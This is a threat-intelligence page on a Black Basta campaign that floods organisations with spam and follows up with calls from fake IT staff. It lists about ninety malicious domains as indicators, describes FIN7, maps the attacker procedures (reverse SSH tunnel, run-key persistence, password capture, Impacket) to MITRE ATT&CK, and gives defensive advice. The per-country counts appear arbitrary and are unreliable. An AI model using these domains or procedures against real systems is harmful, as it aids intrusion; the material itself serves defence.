Campaigns
Black Basta is Bombarding Organisations with Fake Emails and Phone Calls

Black Basta is Bombarding Organisations with Fake Emails and Phone Calls

SpamEmailsPhishingScamHackAlert
Recently, a new cyber attack campaign called "Ongoing Campaign Bombards Enterprises with Spam Emails and Phone Calls" has been targeting organizations by attempting to steal information through fake emails and phone calls. This campaign is aggressively ongoing, aiming to compromise organizational security and obtain sensitive data.

Indicators of Compromise

startupmartec.net
monitorsystem.net
treeauwin.net
otxcarecosmetics.com
protectionek.com
tomlawcenter.com
wardeli.com
masterunix.net
reelsysmoona.net
auuditoe.com
kekeoamigo.com
myfinancialexperts.com
kolinileas.com
consulheartinc.com
garbagemoval.com
topglobaltv.com
steamteamdev.net
thesmartcloudusa.com
artspathgroupe.net
investrealtydom.net
realbumblebee.net
trailcocompany.com
ontexcare.com
childrensdolls.com
getfnewssolutions.com
getfnewsolutions.com
modernbeem.net
audsystemecll.net
monitor-websystem.net
startupbusiness24.net
usaglobalnews.com
jessvisser.com
specialdrills.com
rasapool.net
currentbee.net
withclier.com
buyblocknow.com
investmendvisor.net
technologgies.com
stockinvestlab.net
seohomee.com
startuptechnologyw.net
artspathgroup.net
webnubee.com
unitedfrom.com
constrtionfirst.com
clearsystemwo.net
startupbuss.com
trackgroup.net
bluenetworking.net
onedogsclub.com
artstrailman.com
oneblackwood.com
artstrailreviews.com
buygreenstudio.com
welausystem.net
startupbizaud.net
unougn.com
wipresolutions.com
maluisepaul.com
allcompanycenter.com
wellsystemte.net
prettyanimals.net
simorten.com
trailgroupl.net
trailshop.net
securecloudmanage.com
recentbeelive.com
softradar.net
brendonline.com
caspercan.com
karmafisker.com
airbusco.net
jenshol.com
businessprofessionalllc.com
cloudworldst.net
mytrailinvest.net
gartenlofti.com
investmentrealtyhp.net
thetrailbig.net
taskthebox.net
limitedtoday.com
upd7.com
investmentgblog.net
trailcosolutions.com
septcntr.com
ionoslaba.com
magentoengineers.com
erihudeg.com
businesforhome.com
recentbee.net
otxcosmeticscare.com
animalsfast.net
nebraska-lawyers.com

APT Groups1

FIN7

<b>Description of MISP:</b> Groups targeting financial organizations or people with significant financial assets.<br><br><b>Description of Mitre:</b> Carbanak is a threat group that mainly targets banks. It also refers to malware of the same name (Carbanak). It is sometimes referred to as FIN7, but these appear to be two groups using the same Carbanak malware and are therefore tracked separately. [1] [2]<br><br><b>Description of Etda:</b> FIN7 is a financially-motivated threat group that has primarily targeted the U.S. retail, restaurant, and hospitality sectors since mid-2015. They often use point-of-sale malware. A portion of FIN7 was run out of a front company called Combi Security. FIN7 is sometimes referred to as {{Carbanak, Anunak}}, but these appear to be two groups using the same Carbanak malware and are therefore tracked separately. The reports about arrests made of the mastermind of Carbanak instead of FIN7. However, security research teams keep referring to this arrest for all FIN7 activities since.<br><br>

Carbon SpiderAnunakNavigatorCARBON SPIDERGold NiagaraG0046CoreidG0008TAG-CR1Gold WaterfallELBRUSCalciumITG14GOLD NIAGARASangria TempestCarbanakATK32APT-C-11FIN7ATK 32

Campaign Guidance

Remediation, mitigation, notes, history and related intelligence

RECOMMENDATIONS

Steps to Enhance Cybersecurity

In response to recent cyber attacks, the following steps are recommended to protect your organization:


1. Baseline Your Environment and Use Application Allowlisting


Evaluate your environment by baselining all installed remote monitoring and management (RMM) solutions. Utilize application allowlisting solutions such as AppLocker or Microsoft Defender Application Control to block the execution of all unapproved RMM solutions. For instance, the Quick Assist tool (quickassist.exe) can be blocked from executing via AppLocker. Additionally, it is important to block domains associated with all unapproved RMM solutions. A public GitHub repository provides a catalog of RMM solutions, their binary names, and associated domains.


2. User Awareness and Communication Channels


Ensure that users are aware of the established IT channels and communication methods within your organization to recognize and prevent common social engineering attacks. It is also recommended that users be encouraged to report any suspicious phone calls and texts claiming to be from internal IT staff.


These steps will help your organization become more resilient against cyber attacks and enable users to identify and report suspicious activities effectively.

MITRE ATT&CK Techniques

Tactic

Technique

Procedure

Denial of Service

T1498: Network Denial of Service

The threat actor overwhelms email protection solutions with spam.

Initial Access

T1566.004: Phishing: Spearphishing Voice

The threat actor calls impacted users and pretends to be a member of their organization’s IT team to gain remote access.

Execution

T1059.003: Command and Scripting Interpreter: Windows Command Shell

The threat actor executes batch script after establishing remote access to a user’s asset.

Execution

T1059.001: Command and Scripting Interpreter: PowerShell

Batch scripts used by the threat actor execute certain commands via PowerShell.

Persistence

T1547.001: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

The threat actor creates a run key to execute a batch script via PowerShell, which then attempts to establish a reverse tunnel via SSH.

Defense Evasion

T1222.001: File and Directory Permissions Modification: Windows File and Directory Permissions Modification

The threat actor uses cacls.exe via batch script to modify file permissions.

Defense Evasion

T1140: Deobfuscate/Decode Files or Information

The threat actor encrypted several zip archive payloads with the password “qaz123”.

Credential Access

T1056.001: Input Capture: Keylogging

The threat actor runs a batch script that records the user’s password via command line input.

Discovery

T1033: System Owner/User Discovery

The threat actor uses whoami.exe to evaluate if the impacted user is an administrator or not.

Lateral Movement

T1570: Lateral Tool Transfer

Impacket was used to move payloads between compromised systems.

Command and Control

T1572: Protocol Tunneling


An SSH reverse tunnel is used to provide the threat actor with persistent remote access.

Observed Countries250

AD (711)
AE (472)
AF (91)
AG (763)
AI (72)
AL (376)
AM (670)
AO (168)
AQ (698)
AR (699)
AS (500)
AT (486)
AU (592)
AW (816)
AX (645)
AZ (56)
BA (983)
BB (973)
BD (442)
BE (526)
BF (919)
BG (990)
BH (72)
BI (229)
BJ (534)
BL (348)
BM (443)
BN (174)
BO (551)
BQ (38)
BR (237)
BS (552)
BT (120)
BV (717)
BW (128)
BY (663)
BZ (883)
CA (20)
CC (388)
CD (216)
CF (464)
CG (456)
CH (482)
CI (779)
CK (278)
CL (633)
CM (288)
CN (234)
CO (218)
CR (352)
CU (890)
CV (380)
CW (558)
CX (607)
CY (607)
CZ (990)
DE (569)
DJ (463)
DK (607)
DM (970)
DO (661)
DZ (752)
EC (735)
EE (170)
EG (297)
EH (448)
ER (748)
ES (386)
ET (564)
FI (333)
FJ (213)
FK (990)
FM (727)
FO (883)
FR (441)
GA (858)
GB (973)
GD (377)
GE (936)
GF (302)
GG (470)
GH (578)
GI (596)
GL (810)
GM (900)
GN (316)
GP (197)
GQ (936)
GR (9)
GS (347)
GT (755)
GU (376)
GW (114)
GY (943)
HK (624)
HM (548)
HN (819)
HR (997)
HT (661)
HU (857)
ID (434)
IE (546)
IL (296)
IM (808)
IN (834)
IO (851)
IQ (535)
IR (481)
IS (552)
IT (843)
JE (961)
JM (488)
JO (453)
JP (782)
KE (338)
KG (876)
KH (348)
KI (775)
KM (476)
KN (721)
KP (125)
KR (710)
KW (537)
KY (680)
KZ (101)
LA (533)
LB (924)
LC (274)
LI (986)
LK (865)
LR (350)
LS (128)
LT (438)
LU (946)
LV (610)
LY (63)
MA (185)
MC (264)
MD (675)
ME (969)
MF (525)
MG (858)
MH (587)
MK (131)
ML (943)
MM (197)
MN (282)
MO (748)
MP (402)
MQ (390)
MR (103)
MS (592)
MT (193)
MU (453)
MV (236)
MW (58)
MX (701)
MY (868)
MZ (855)
NA (574)
NC (800)
NE (409)
NF (601)
NG (104)
NI (151)
NL (331)
NO (823)
NP (814)
NR (288)
NU (459)
NZ (131)
OM (227)
PA (122)
PE (678)
PF (208)
PG (322)
PH (252)
PK (270)
PL (3)
PM (624)
PN (58)
PR (66)
PS (48)
PT (548)
PW (903)
PY (642)
QA (675)
RE (91)
RO (487)
RS (926)
RU (928)
RW (557)
SA (765)
SB (279)
SC (803)
SD (851)
SE (384)
SG (95)
SH (589)
SI (224)
SJ (879)
SK (732)
SL (940)
SM (576)
SN (717)
SO (235)
SR (349)
SS (349)
ST (143)
SV (732)
SX (641)
SY (430)
SZ (760)
TC (506)
TD (67)
TF (6)
TG (353)
TH (278)
TJ (686)
TK (620)
TL (764)
TM (12)
TN (63)
TO (97)
TR (552)
TT (623)
TV (994)
TW (40)
TZ (313)
UA (746)
UG (791)
UM (275)
US (667)
UY (33)
UZ (239)
VA (690)
VC (793)
VE (394)
VG (317)
VI (219)
VN (578)
VU (423)
WF (68)
WS (152)
XK (857)
YE (933)
YT (209)
ZA (818)
ZM (203)
ZW (673)